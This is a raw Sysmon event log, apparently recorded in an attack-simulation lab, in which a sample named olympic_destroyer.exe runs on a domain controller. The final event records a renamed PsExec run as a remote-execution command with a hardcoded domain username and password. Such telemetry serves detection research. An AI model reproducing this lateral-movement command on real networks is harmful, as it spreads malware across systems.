10:57:34.229{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293169Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.229{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293168Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.229{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293167Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.229{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293166Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.229{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293165Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.228{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293164Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.228{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293163Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.228{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293162Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.228{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293161Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.228{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293160Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.228{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293159Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.228{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293158Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.228{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293157Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.228{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293156Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.228{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293155Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.228{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293154Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.228{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293153Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.228{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293152Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.228{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293151Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.227{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293150Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.227{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293149Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.227{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293148Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.227{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293147Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:34.227{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293243Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.865{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-131F-6216-5706-000000003802}676C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293242Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.833{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293241Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.833{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293240Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.832{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293239Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.832{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293238Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.812{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-131F-6216-5706-000000003802}676C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000293237Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:35.820{C8EA50B7-131F-6216-5706-000000003802}676C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "VULT\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f 